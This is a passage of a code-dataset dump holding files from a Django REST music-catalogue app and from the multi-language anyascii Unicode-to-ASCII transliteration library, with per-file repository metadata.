ArtistSerializer\n\n def get(self, request, *args, **kwargs):\n return self.retrieve(request, *args, **kwargs)\n\n def put(self, request, *args, **kwargs):\n return self.update(request, *args, **kwargs)\n\n def delete(self, request, *args, **kwargs):\n return self.destroy(request, *args, **kwargs)\n\nclass CategoryList(mixins.ListModelMixin, mixins.CreateModelMixin, generics.GenericAPIView):\n queryset = Category.objects.all()\n serializer_class = CategorySerializer\n pagination_class = StandardResultsSetPagination\n\n\n def get(self, request, *args, **kwargs):\n return self.list(request, *args, **kwargs)\n\n def post(self, request, *args, **kwargs):\n return self.create(request, *args, **kwargs)\n\nclass CategoryDetail(mixins.RetrieveModelMixin, mixins.UpdateModelMixin, mixins.DestroyModelMixin, generics.GenericAPIView):\n queryset = Category.objects.all()\n serializer_class = CategorySerializer\n\n def get(self, request, *args, **kwargs):\n return self.retrieve(request, *args, **kwargs)\n\n def put(self, request, *args, **kwargs):\n return self.update(request, *args, **kwargs)\n\n def delete(self, request, *args, **kwargs):\n return self.destroy(request, *args, **kwargs)\n\nclass AlbumList(mixins.ListModelMixin, mixins.CreateModelMixin, generics.GenericAPIView):\n queryset = Album.objects.all()\n serializer_class = AlbumSerializer\n filter_backends = (filters.DjangoFilterBackend,filters.OrderingFilter,)\n pagination_class = StandardResultsSetPagination\n filter_fields = ('title', 'rating', 'categories','numOfRatings','artists','id')\n ordering_fields = ('title', 'rating', 'categories','numOfRatings','artists','id')\n\n def get(self, request, *args, **kwargs):\n return self.list(request, *args, **kwargs)\n\n def post(self, request, *args, **kwargs):\n return self.create(request, *args, **kwargs)\n\nclass AlbumDetail(mixins.RetrieveModelMixin, mixins.UpdateModelMixin, mixins.DestroyModelMixin, generics.GenericAPIView):\n queryset = Album.objects.all()\n serializer_class = AlbumSerializer\n\n def get(self, request, *args, **kwargs):\n return self.retrieve(request, *args, **kwargs)\n\n def put(self, request, *args, **kwargs):\n return self.update(request, *args, **kwargs)\n\n def delete(self, request, *args, **kwargs):\n return self.destroy(request, *args, **kwargs)\n\n\nclass CommentaryList(mixins.ListModelMixin, mixins.CreateModelMixin, generics.GenericAPIView):\n queryset = Commentary.objects.all()\n serializer_class = CommentarySerializer\n\n def get(self, request, *args, **kwargs):\n return self.list(request, *args, **kwargs)\n\n def post(self, request, *args, **kwargs):\n return self.create(request, *args, **kwargs)\n\n\nclass CommentaryDetail(mixins.RetrieveModelMixin, mixins.UpdateModelMixin, mixins.DestroyModelMixin, generics.GenericAPIView):\n queryset = Commentary.objects.all()\n serializer_class = CommentarySerializer\n pagination_class = StandardResultsSetPagination\n\n\n def get(self, request, *args, **kwargs):\n return self.retrieve(request, *args, **kwargs)\n\n def put(self, request, *args, **kwargs):\n return self.update(request, *args, **kwargs)\n\n def delete(self, request, *args, **kwargs):\n return self.destroy(request, *args, **kwargs)\n\nclass AudioAlbumAssociation(APIView):\n def get(self,request,idAudio, idAlbum,format=None):\n audio = Audio.objects.get(id=idAudio)\n album = Album.objects.get(id=idAlbum)\n album.audios.add(audio)\n serializer = AudioSerializer(audio)\n return Response(serializer.data)\n\n def delete(self, request, idAudio, idAlbum, format=None):\n audio = Audio.objects.get(id=idAudio)\n album = Album.objects.get(id=idAlbum)\n album.audios.remove(audio)\n serializer = AudioSerializer(audio)\n return Response(serializer.data)\n\nclass RateAudio(APIView):\n def get(self,request,idAudio, rating,format=None):\n audio = Audio.objects.get(id=idAudio)\n newRate = ((audio.rating * audio.numOfRatings) + int(rating))/(audio.numOfRatings + 1)\n audio.rating=newRate\n audio.numOfRatings += 1\n audio.save()\n serializer = AudioSerializer(audio)\n return Response(serializer.data)\n\nclass RateAlbum(APIView):\n def get(self,request,idAlbum, rating,format=None):\n album = Album.objects.get(id=idAlbum)\n newRate = ((album.rating * album.numOfRatings) + int(rating))/(album.numOfRatings + 1)\n album.rating=newRate\n album.numOfRatings += 1\n album.save()\n serializer = AlbumSerializer(album)\n return Response(serializer.data)\n\nclass PlayAudio(APIView):\n def get(self,request,idAudio,format=None):\n audio = Audio.objects.get(id=idAudio)\n audio.playCount += 1\n audio.save()\n serializer = AudioSerializer(audio)\n return Response(serializer.data)\n\nclass DownloadAudio(APIView):\n def get(self,request,idAudio,format=None):\n audio = Audio.objects.get(id=idAudio)\n audio.downloadsCount += 1\n audio.save()\n serializer = AudioSerializer(audio)\n return Response(serializer.data)\n\nclass CategoriesTopRating(APIView):\n def get(self,request,size,format=None):\n resp = []\n categories = Category.objects.all()\n for c in categories:\n cat = {}\n serializer = CategorySerializer(c)\n cat['id']=c.pk\n cat['name']=c.name\n cat['image'] = c.image\n audios = Audio.objects.filter(categories__in=[c.pk]).order_by('-rating')\n audList = []\n var = 0\n for a in audios:\n aud = {}\n aud['id'] = a.pk\n aud['name'] = a.name\n aud['title'] = a.title\n aud['audioDownload'] = a.audioDownload\n aud['audioPlay'] = a.audioPlay\n aud['playCount'] = a.playCount\n aud['downloadsCount'] = a.downloadsCount\n aud['rating'] = a.rating\n aud['uploadDate'] = a.uploadDate\n\n artists = Artist.objects.filter(audios__in=[a.pk]).order_by('name')\n artList = []\n for t in artists:\n art = {}\n art['id'] = t.pk\n art['name'] = t.name\n art['image'] = t.image\n artList.append(art)\n\n aud['artists'] = artList\n\n audList.append(aud)\n if var == int(size)-1:\n break\n\n cat['audios']=audList\n resp.append(cat)\n\n return JsonResponse(resp, safe=False)" }, { "alpha_fraction": 0.817427396774292, "alphanum_fraction": 0.817427396774292, "avg_line_length": 25.88888931274414, "blob_id": "faf6796bbdfc87eb2ac3102826006e852d73fb81", "content_id": "091da42f2cb54ee07311e10b96904f86b972380f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 241, "license_type": "no_license", "max_line_length": 62, "num_lines": 9, "path": "/sonidosLibresApp/admin.py", "repo_name": "osorkon5513/turing201620", "src_encoding": "UTF-8", "text": "from django.contrib import admin\n\nfrom .models import Category, Audio, Commentary, Album, Artist\n\nadmin.site.register(Category)\nadmin.site.register(Audio)\nadmin.site.register(Commentary)\nadmin.site.register(Album)\nadmin.site.register(Artist)" }, { "alpha_fraction": 0.5842245817184448, "alphanum_fraction": 0.6109625697135925, "avg_line_length": 27.769229888916016, "blob_id": "957b87bdbd33c7f5ec30608b430b3c9b00c0aa2e", "content_id": "a56c1cd5ab9d30cb913976599b1c5337437399b0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 748, "license_type": "no_license", "max_line_length": 119, "num_lines": 26, "path": "/sonidosLibresApp/migrations/0002_auto_20161008_2224.py", "repo_name": "osorkon5513/turing201620", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9.9 on 2016-10-09 03:24\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('sonidosLibresApp', '0001_initial'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='category',\n name='description',\n field=models.TextField(default='This is a generic description'),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='category',\n name='relatedCategories',\n field=models.ManyToManyField(related_name='_category_relatedCategories_+', to='sonidosLibresApp.Category'),\n ),\n ]\n" } ]
11
patilpooja99/cricpy
https://github.com/patilpooja99/cricpy
7324beac27ef49696e5d23894c7de30b8918d5a9
c4bd96989abab7bb67b88ee1b0f045af8143ac95
57c463c8c1c0822281a1f3b27a829b297749ffad
refs/heads/master
2020-12-15T08:30:59.624088
2020-01-20T08:26:16
2020-01-20T08:26:16
235,047,237
2
0
null
null
null
null
null
[ { "alpha_fraction": 0.718120813369751, "alphanum_fraction": 0.7217002511024475, "avg_line_length": 34.4603157043457, "blob_id": "06fe5e56b3d22933cf8ca85fa1adc688aa12f7de", "content_id": "878ac36de87310f4bafb9ba0faeebf26f8c85a73", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2235, "license_type": "no_license", "max_line_length": 93, "num_lines": 63, "path": "/summarizer.py", "repo_name": "patilpooja99/cricpy", "src_encoding": "UTF-8", "text": "from urllib import request\nfrom bs4 import BeautifulSoup as bs\nimport re\nimport nltk\nimport heapq\n\n\n\n\nurl = \"https://en.wikipedia.org/wiki/Artificial_Intelligence\"\nallParagraphContent = \"\"\nhtmlDoc = request.urlopen(url)\nsoupObject = bs(htmlDoc,'html.parser')\nparagraphContents = soupObject.findAll('p')\n#print(paragraphContents)\n\nfor paragraphContent in paragraphContents:\n allParagraphContent += paragraphContent.text\n #print(paragraphContent)\n\nallParagraphContent_cleanerData = re.sub(r'\\[[0-9]*\\]',' ', allParagraphContent)\nallParagraphContent_cleanedData = re.sub(r'\\s+',' ', allParagraphContent_cleanerData)\n\n#print(allParagraphContent_cleanedData)\n\n#allParagraphContent_cleanedData = re.sub(r'[^a-zA-Z]',' ', allParagraphContent_cleanedData)\n#allParagraphContent_cleanedData = re.sub(r'\\s+',' ', allParagraphContent_cleanedData)\n\n##### creating Sentence Tokens\nsentences_tokens = nltk.sent_tokenize(allParagraphContent_cleanedData)\nwords_tokens =nltk.word_tokenize(allParagraphContent_cleanedData)\n\n##### calculate the frequency\nstopwords= nltk.corpus.stopwords.words('english')\nword_frequencies = {}\n\nfor word in words_tokens:\n if word not in stopwords:\n if word not in word_frequencies.keys():\n word_frequencies[word] = 1\n else:\n word_frequencies[word] += 1\n#print(word_frequencies)\n##### calculate weighted frequency\nmaximum_frequency_word = max(word_frequencies.values())\nfor word in word_frequencies.keys():\n word_frequencies[word] = (word_frequencies[word]/maximum_frequency_word)\n#print(word_frequencies)\n\n#####calculate sentence score with each word weighted frequency\nsentences_scores = {}\nfor sentence in sentences_tokens:\n for word in nltk.word_tokenize(sentence.lower()):\n if word in word_frequencies.keys():\n if len(sentence.split(' ')) < 30:\n if sentence not in sentences_scores.keys():\n sentences_scores[sentence] = word_frequencies[word]\n else:\n sentences_scores[sentence] += word_frequencies[word]\n#print(sentences_scores)\n \nsummary_artificialIntelligence = heapq.nlargest(5,sentences_scores, key=sentences_scores.get)\nprint(summary_artificialIntelligence)\n\n" } ]
1
casept/anyascii
https://github.com/casept/anyascii
c27261d87257c17c47fe0e9fc77438437de94c1c
d4f426b91751254b68eaa84c6cd23099edd668e6
5e0755091efd2d4ed61bead8aa38b45bab5a8b07
refs/heads/master
2022-12-05T07:13:53.075144
2020-08-07T07:55:50
2020-08-07T07:55:50
285,904,577
0
0
ISC
2020-08-07T19:19:59
2020-08-07T19:19:52
2020-08-07T09:42:30
null
[ { "alpha_fraction": 0.35185185074806213, "alphanum_fraction": 0.3888888955116272, "avg_line_length": 54, "blob_id": "0d7749fe50edee941822ddb4282bb5f693683ceb", "content_id": "46352ebf96f85b4033f78fc28e0681bfa55bd6da", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 54, "license_type": "permissive", "max_line_length": 54, "num_lines": 1, "path": "/ruby/lib/data/2d0.rb", "repo_name": "casept/anyascii", "src_encoding": "UTF-8", "text": "module X2d0 B='\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tLi'.split '\t' end" }, { "alpha_fraction": 0.4984709620475769, "alphanum_fraction": 0.538226306438446, "avg_line_length": 22.35714340209961, "blob_id": "be575cbad212111e8391f0ff953b6a7f9f2ba5e9", "content_id": "3db6b6430bdf3254c112a917092e80f79a5a2169", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 327, "license_type": "permissive", "max_line_length": 69, "num_lines": 14, "path": "/src/main/resources/com/anyascii/build/gen/body.sh", "repo_name": "casept/anyascii", "src_encoding": "UTF-8", "text": "output=\nfor cp in $(printf %s \"$*\" | iconv -f utf8 -t utf32le | od -A n -t u)\ndo\n\tif test \"$cp\" -lt 128\n\tthen\n\t\ts=$(printf \"\\\\$(printf %o \"$cp\")\")\n\telse\n\t\tblock_num=$(printf %03x $((cp >> 8)))\n\t\teval \"block=\\$_$block_num\"\n\t\ts=$(printf %s \"$block\" | cut -f$(((cp & 255) + 1)))\n\tfi\n\toutput=$output$s\ndone\nprintf '%s\\n' \"$output\"\n" }, { "alpha_fraction": 0.3333333432674408, "alphanum_fraction": 0.3333333432674408, "avg_line_length": 75, "blob_id": "735da2d6c5ba105d448828a7c2b5399fc3fc8a3f", "content_id": "da10a5506a21c8c21d48f86c95cabaffba5fbbdd", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 75, "license_type": "permissive", "max_line_length": 75, "num_lines": 1, "path": "/js/data/2e4.js", "repo_name": "casept/anyascii", "src_encoding": "UTF-8", "text": "module.exports='\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tFan\t\t\t\t\t\t\t\t\t\t\t\t\t\tYing'.split('\t')" }, { "alpha_fraction": 0.692307710647583, "alphanum_fraction": 0.7692307829856873, "avg_line_length": 12, "blob_id": "c68d7363e7dd85ba88c728f73eae5f9cd396473b", "content_id": "5a2d58b09b39cf68fb845d42306415629015a12c", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "Go Module", "length_bytes": 39, "license_type": "permissive", "max_line_length": 29, "num_lines": 3, "path": "/go/go.mod", "repo_name": "casept/anyascii", "src_encoding": "UTF-8", "text": "module github.com/anyascii/go\n\ngo 1.12\n" }, { "alpha_fraction": 0.6022727489471436, "alphanum_fraction": 0.7386363744735718, "avg_line_length": 13.833333015441895, "blob_id": "4c5a1bfd444407c45d82902adaaaa40c9783d6d2", "content_id": "8bb6034edc9b956932c7d052f0dc99d4cbb34750", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 88, "license_type": "permissive", "max_line_length": 39, "num_lines": 6, "path": "/python/tox.ini", "repo_name": "casept/anyascii", "src_encoding": "UTF-8", "text": "[tox]\nenvlist = py39,py38,py37,py36,py35,py34\n\n[testenv]\ndeps = pytest\ncommands = pytest" }, { "alpha_fraction": 0.30263158679008484, "alphanum_fraction": 0.30263158679008484, "avg_line_length": 76, "blob_id": "41b585ac35b7a1feac94f6425b1e8428dc58760b", "content_id": "9a78734f34aa3df3838f69cf04c04de32869e237", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 76, "license_type": "permissive", "max_line_length": 76, "num_lines": 1, "path": "/php/_data/_2e4.php", "repo_name": "casept/anyascii", "src_encoding": "UTF-8", "text": "<?php return explode('\t','\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tFan\t\t\t\t\t\t\t\t\t\t\t\t\t\tYing');" }, { "alpha_fraction": 0.6686102747917175, "alphanum_fraction": 0.6744412183761597, "avg_line_length": 48.0476188659668, "blob_id": "15b509d434b5450d3598fb8ab7e477ffcbf0680c", "content_id": "ae3f0ca8343413723b131470e075a1bc8ace3dfd", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 1029, "license_type": "permissive", "max_line_length": 92, "num_lines": 21, "path": "/ruby/any_ascii.gemspec", "repo_name": "casept/anyascii", "src_encoding": "UTF-8", "text": "Gem::Specification.new do |s|\n s.name = 'any_ascii'\n s.version = '0.1.7-dev'\n s.summary = 'Unicode to ASCII transliteration'\n s.description =\n 'Unicode to ASCII transliteration.' +\n ' Converts Unicode text to a reasonable representation using only ASCII.' +\n ' For most characters in Unicode, AnyAscii provides an ASCII-only replacement string.' +\n ' Text is converted character-by-character without considering the context.' +\n ' The mappings for each script are based on popular existing romanization schemes.' +\n ' Symbolic characters are converted based on their meaning or appearance.' +\n ' All ASCII characters in the input are left unchanged,' +\n ' every other character is replaced with printable ASCII characters.' +\n ' Unknown characters are removed.'\n s.authors = ['Hunter WB']\n s.email = '[email protected]'\n s.files = Dir.glob 'lib/**/*.rb'\n s.homepage = 'https://github.com/anyascii/anyascii'\n s.license = 'ISC'\n s.required_ruby_version = '>= 2.0.0'\nend" }, { "alpha_fraction": 0.5498489141464233, "alphanum_fraction": 0.5528700947761536, "avg_line_length": 34.5, "blob_id": "bd95e62bd6cc386d9e5e74bae4d24d3fc842fef5", "content_id": "ae56b4c197c6b3463f77ccd198f9ab5abb88dcec", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 993, "license_type": "permissive", "max_line_length": 125, "num_lines": 28, "path": "/src/main/java/com/anyascii/build/gen/CSharp.kt", "repo_name": "casept/anyascii", "src_encoding": "UTF-8", "text": "package com.anyascii.build.gen\n\nimport java.nio.file.Files\nimport java.nio.file.Path\n\nfun cSharp(g: Generator) {\n Files.newBufferedWriter(Path.of(\"csharp/src/Transliteration.blocks.cs\")).use { w ->\n w.write(\"using System.Collections.Generic;\\n\")\n w.write(\"using System;\\n\\n\")\n w.write(\"namespace AnyAscii\\n\")\n w.write(\"{\\n\")\n w.write(\"\\tpublic static partial class Transliteration\\n\")\n w.write(\"\\t{\\n\")\n w.write(\"\\t\\tprivate static readonly Dictionary<int, Lazy<string[]>> blocks = new Dictionary<int, Lazy<string[]>>\\n\")\n w.write(\"\\t\\t{\\n\")\n\n for ((blockNum, block) in g.blocks) {\n val h = \"%03x\".format(blockNum)\n w.write(\"\\t\\t\\t{ 0x$h, new Lazy<string[]>(() => new[] { ${block.joinToString { escape(it) } } }) },\\n\")\n }\n\n w.write(\"\\t\\t};\\n\")\n w.write(\"\\t}\\n\")\n w.write(\"}\\n\")\n }\n}\n\nprivate fun escape(s: String) = '\"' + s.replace(\"\\\\\", \"\\\\\\\\\").replace(\"\\\"\", \"\\\\\\\"\") + '\"'" }, { "alpha_fraction": 0.31168830394744873, "alphanum_fraction": 0.33766233921051025, "avg_line_length": 77, "blob_id": "fd46ead884fca248398dd517df349c4a17155d3a", "content_id": "21b7c3c11ea741e21a574195a4b8e12a90097f3e", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 77, "license_type": "permissive", "max_line_length": 77, "num_lines": 1, "path": "/ruby/lib/data/2e4.rb", "repo_name": "casept/anyascii", "src_encoding": "UTF-8", "text": "module X2e4 B='\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tFan\t\t\t\t\t\t\t\t\t\t\t\t\t\tYing'.split '\t' end" }, { "alpha_fraction": 0.6891891956329346, "alphanum_fraction": 0.6891891956329346, "avg_line_length": 17.5, "blob_id": "0147b0ca96d6311d29b8f64e24a9a1913a4b51d7", "content_id": "c991aaca0eb1451dc864d252896e2d34ae3d4feb", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 156, "license_type": "permissive", "max_line_length": 50, "num_lines": 8, "path": "/go/README.md", "repo_name": "casept/anyascii", "src_encoding": "UTF-8", "text": "```go\nimport \"github.com/anyascii/go\"\n\ns := anyascii.Transliterate(\"άνθρωποι\")\n// anthropoi\n```\n\n[**README**](https://github.com/anyascii/anyascii)\n" }, { "alpha_fraction": 0.5664195418357849, "alphanum_fraction": 0.5866559743881226, "avg_line_length": 28.358823776245117, "blob_id": "18f046aa3cf633aabd3c6a31bbde94b58994cffc", "content_id": "a48e9089dfd3263abd6e51a8cffe0f33bba89573", "detected_licenses": [ "GPL-1.0-or-later", "Artistic-1.0-Perl", "ISC" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 5045, "license_type": "permissive", "max_line_length": 74, "num_lines": 170, "path": "/unidecode/src/TODO.txt", "repo_name": "casept/anyascii", "src_encoding": "UTF-8", "text": "# -*-coding:utf-8;-*- ··················································\n# Last Modified Time-stamp: \"2015-10-16 03:34:44 MDT [email protected]\"\n#======================================================================\n\n\t ~~ Text::Unidecode TODO file ~~\n\nTODO: make the table files be built from the Unicode character\ndatabase, transitioning from the values in the current table files.\nI used to have a whole bunch of concise files that compiled to\nthe xXX.pm table files. But they're in a file format I\nhaven't dealt with since 2001, so screw it all, I'm starting\nfrom zero and it will be... well, you'll see.\n\n(Presumably the Hangul and the Unihan blocks are outside the\nscope of that whole ruckus of named characters.)\n\n\nTODO GTD:\nKeep plugging in suggestions from Tomaž Šolc's message\n\n\nTODO:\nFigure out how to courteously declare dependencies in my Makefile.PL\n\nTODO:\nBundle with a \"unidecode\" util that calls a routine in Unidecode.pm?\nOr maybe just show it as a one-liner in the POD?\n\nTODO:\nAlso show it with an example use with iconv\n\nTODO:\nPlow through more bug reports, applying patches etc,\nespecially stuff from that nice Tomaž Šolc man.\n\nTODO:\n\n***DEFINITELY*** Make it handle stuff in Astral Plane (over U+FFFF)\nTake that plunge, or ascend into the plane, or whatever. DOIT.\n\nTODO:\n\nCurrently, all the files are in Unix newline format (LF).\nMaybe CR+LF is technically more universal, and I could switch\nto that. But so far I've gotten no complaints that I should\ngo do that.\n\nTODO:\n\nTHEN re-run the thing that reads the Unihan database and generates\nall the Text/Unidecode/__.pm files.\n(Do the hyperspace handling first, because lots of Unihan\nstuff is up there.)\n\nTODO:\n\nLook to see whether I need to deal with the Arabic stuff in\nthe U+FBxx etc blocks. I thought it was always just\nfont-internal stuff, but I'm starting to suspect that it may\nbe encountered in the real world\n\nTODO:\n\nOf course:\n- Check for new glyphs in existing tables.\n- Look at whole new tables (like the Philippine scripts) in\nnormal space (x < U+FFFF)\n- Look at the wild wilderness in hyperspace (x > U+FFFF\n\n\n======================================================================\n======================================================================\n\n########################################################################\nBelow here is TODOs from the Unicode version in 2001. Yes, that long ago.\n\n\n============================== BLOCK 09 ==============================\n\nWhat's an isshar? (09FA = \"bengali isshar\")\n\n\n============================== BLOCK 0b ==============================\n\nWhat's an isshar? (0B70 = \"oriya isshar\")\n\n\n============================== BLOCK 0e ==============================\n\nWhat is 0E4C = \"thai character thanthakhat\" ?\n\nWhat is 0E4E = \"thai character yamakkan\" ?\n\n\n============================== BLOCK 0f ==============================\n\nVarious questions to do with Tibetan (0f00-0fff)...\n\nA lot of these characters end up as \"\". What to do with them?\n\nHow to represent these Astrological signs, 0F15-0F1F ?\n\nWhat is a 0F38 = \"Tibetan mark Che Mgo\" ?\n\nShould I leave \"Marks and Signs\" (0F82-0F87) as \"\"?\n\nWhat to do with \"Transliteration head letters\" (0F88-0F8B) ?\n\n\n============================== BLOCK 11 ==============================\n\nVarious Hangul components need checking:\n\nWhat are chitueumsios, chitueumssangsios,\nceongchieumsios, and ceongchieumssangsios?\n\nIs \"Z\" a good transliteration for pansios?\n\nI'm using \"N\" for yesieung and kapyeoun both. Is this right?\n\nWhat are chitueumcieuc, chitueumssangcieuc, ceongchieumcieuc,\nceongchieumssangcieuc, chitueumchieuch, and ceongchieumchieuch?\n\nIs \"kapyeounphieuph\" best transliterated as \"Np\" or \"pN\"?,\nand so on for: kapyeounrieul, kapyeounmieum, kapyeounpieup,\nkapyeounssangpieup, kapyeounphieuph\n\nI'm using \"Q\" for yeorinhieuh, apparently an archaic glottal\nstop character. Is that right?\n\n\n============================== BLOCK 14 ==============================\n\nHow to transliterate 0x1426,\nAKA \"canadian syllabics final double short vertical strokes\"?\n\nHow to transliterate 0x1429, AKA \"canadian syllabics final plus\"?\n\n\n============================== BLOCK 16 ==============================\n\nFact-check the Ogham and Runes.\n\nWhat are eabhadh, or, uilleann, ifin, eamhancholl, and peith (1695-169A)?\n\n\n============================== BLOCK 18 ==============================\n\nWhat's 180A = \"Mongolian nirugu\" ?\n\n\n============================== BLOCK 31 ==============================\n\nI leave the Kaeriten (3190-319F) as null-string. Is that good?\n\n\n============================== BLOCK fb ==============================\n\nArabic Presentation Forms-A (FB50-FDFF) -- do I need to\ndo these, or are they never actually found in text files?\n\n\n============================== BLOCK fe ==============================\n\nArabic Presentation Forms-B (FE70-FEFF) -- do I need to\ndo these, or are they never actually found in text files?\n\n\n======================================================================\n(end)\n" }, { "alpha_fraction": 0.3181818127632141, "alphanum_fraction": 0.3181818127632141, "avg_line_length": 88, "blob_id": "73567fa33dc838419037252167e4fc5e5594f881", "content_id": "22acab3f5cc768a89f22a2e3f3cb287eece66f57", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 88, "license_type": "permissive", "max_line_length": 88, "num_lines": 1, "path": "/js/data/2e0.js", "repo_name": "casept/anyascii", "src_encoding": "UTF-8", "text": "module.exports='\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tLao\t\t\t\t\t\tGun\t\t\t\t\t\t\t\tGeng'.split('\t')" }, { "alpha_fraction": 0.6610169410705566, "alphanum_fraction": 0.6610169410705566, "avg_line_length": 18.66666603088379, "blob_id": "194d0316e617d4dfd660e0a7991cbfbbf46e6259", "content_id": "fe191be0234543330c340078a879c0a6f01e883d", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 126, "license_type": "permissive", "max_line_length": 50, "num_lines": 6, "path": "/php/README.md", "repo_name": "casept/anyascii", "src_encoding": "UTF-8", "text": "```php\n$s = AnyAscii::transliterate('άνθρωποι');\n// anthropoi\n```\n\n[**README**](https://github.com/anyascii/anyascii)\n" }, { "alpha_fraction": 0.5629496574401855, "alphanum_fraction": 0.5755395889282227, "avg_line_length": 14.472222328186035, "blob_id": "0fa1e27ae2cc62636960df93289313e012446620", "content_id": "3d45eff186e8ee89a0c431da2d2581ff900b9484", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 556, "license_type": "permissive", "max_line_length": 35, "num_lines": 36, "path": "/ruby/lib/any_ascii.rb", "repo_name": "casept/anyascii", "src_encoding": "UTF-8", "text": "module AnyAscii\n\n\tBLOCKS = Hash.new { |h, k|\n\t\ts = '%03x' % k\n\t\tbegin\n\t\t\trequire_relative \"data/#{s}.rb\"\n\t\trescue LoadError\n\t\t\tb = []\n\t\telse\n\t\t\tb = Object.const_get(\"X#{s}\")::B\n\t\tend\n\t\th[k] = b\n\t}\n\n\tprivate_constant :BLOCKS\n\n\tdef self.transliterate(string)\n\t\tif string.ascii_only?\n\t\t\treturn string\n\t\tend\n\t\tresult = ''\n\t\tstring.each_codepoint { |cp|\n\t\t\tif cp <= 127\n\t\t\t\tresult << cp\n\t\t\telse\n\t\t\t\tblock_num = cp >> 8\n\t\t\t\tlo = cp & 0xFF\n\t\t\t\tblock = BLOCKS[block_num]\n\t\t\t\tif block.length > lo\n\t\t\t\t\tresult << block[lo]\n\t\t\t\tend\n\t\t\tend\n\t\t}\n\t\treturn result\n\tend\nend" }, { "alpha_fraction": 0.6511628031730652, "alphanum_fraction": 0.6511628031730652, "avg_line_length": 16.91666603088379, "blob_id": "ac70b5616b277d643bba0489eaecd6dc8f521cd1", "content_id": "9ba705f7a38fe0a04ea193024a5043a2afe92c2a", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 215, "license_type": "permissive", "max_line_length": 37, "num_lines": 12, "path": "/test.sh", "repo_name": "casept/anyascii", "src_encoding": "UTF-8", "text": "#!/bin/sh\n\nset -eux\n\nnpm test\ngo test ./go\nruby ruby/lib/any_ascii_test.rb\ncd rust && cargo test && cd -\ncd python && python -m pytest && cd -\ncd java && ./mvnw test && cd -\ndotnet test csharp/test\nphp php/test.php\n" }, { "alpha_fraction": 0.4761904776096344, "alphanum_fraction": 0.5, "avg_line_length": 42, "blob_id": "97d97e58cd7d90e787d2657dbbc7085b8e85af76", "content_id": "750f669192ffbc1850d8f33c737638111ca15752", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 42, "license_type": "permissive", "max_line_length": 42, "num_lines": 1, "path": "/ruby/lib/data/2dd.rb", "repo_name": "casept/anyascii", "src_encoding": "UTF-8", "text": "module X2dd B='\t\t\t\t\t\t\t\t\t\tWu'.split '\t' end" }, { "alpha_fraction": 0.30000001192092896, "alphanum_fraction": 0.3222222328186035, "avg_line_length": 90, "blob_id": "38267c4fbd44dc28f26a7f5f4d3b529fb92fa235", "content_id": "35f0ac1bfe6c1d82e4b726e20ca59e47b03be15a", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 90, "license_type": "permissive", "max_line_length": 90, "num_lines": 1, "path": "/ruby/lib/data/2e0.rb", "repo_name": "casept/anyascii", "src_encoding": "UTF-8", "text": "module X2e0 B='\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tLao\t\t\t\t\t\tGun\t\t\t\t\t\t\t\tGeng'.split '\t' end" }, { "alpha_fraction": 0.5882353186607361, "alphanum_fraction": 0.591911792755127, "avg_line_length": 29.27777862548828, "blob_id": "ef95ea5ebed66235150477bb287ee642f9170c84", "content_id": "1be7eae77422e974d3b76b6040520baac8c5568a", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 544, "license_type": "permissive", "max_line_length": 86, "num_lines": 18, "path": "/src/main/java/com/anyascii/build/gen/Ruby.kt", "repo_name": "casept/anyascii", "src_encoding": "UTF-8", "text": "package com.anyascii.build.gen\n\nimport java.nio.file.Files\nimport java.nio.file.Path\n\nfun ruby(g: Generator) {\n val dirPath = Path.of(\"ruby/lib/data\")\n dirPath.toFile().deleteRecursively()\n Files.createDirectories(dirPath)\n\n for ((blockNum, block) in g.blocks) {\n val b = \"%03x\".format(blockNum)\n Files.newBufferedWriter(dirPath.resolve(\"$b.rb\")).use { w ->\n val s = block.joinToString(\"\\t\").replace(\"\\\\\", \"\\\\\\\\\").replace(\"'\", \"\\\\'\")\n w.write(\"module 